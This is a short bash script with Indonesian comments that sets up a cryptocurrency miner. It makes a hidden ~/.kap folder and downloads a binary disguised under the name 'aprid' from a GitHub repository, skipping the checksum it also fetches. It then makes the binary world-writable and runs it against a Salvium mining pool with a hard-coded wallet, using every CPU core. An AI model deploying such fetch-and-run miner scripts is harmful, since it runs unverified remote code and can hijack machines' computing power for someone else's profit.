#!/bin/bash

# Buat direktori .kap dan masuk ke dalamnya
mkdir -p ~/.kap && cd ~/.kap

# Fungsi wget dengan retry (tanpa proxychains)
download_with_retry() {
    wget --tries=10 \
      --retry-connrefused \
      --timeout=30 \
      --waitretry=15 \
      -O "$1" "$2"
}

# Unduh aprid dan SHA256SUMS menggunakan wget dengan retry
download_with_retry "aprid" "https://github.com/Dewinet/your/raw/refs/heads/main/aprid"
download_with_retry "SHA256SUMS" "https://github.com/Dewinet/your/raw/refs/heads/main/SHA256SUMS"

# Beri izin eksekusi ke aprid
chmod 777 aprid

# Jalankan mining tanpa proxychains
./aprid --donate-level 1 \
    -o sg.salvium.herominers.com:1230 \
    -u SaLvs8XxvQyYjNN8GjS2LaiB1agypotxhEFKEnEEfbQvRbLxrdmkx2i8wHNcNHJbXCa9kASD1LZFyccETuEUc1HpUAtTJ3h4JUP \
    -p EMPUY -a rx/0 -k -t $(nproc --all)
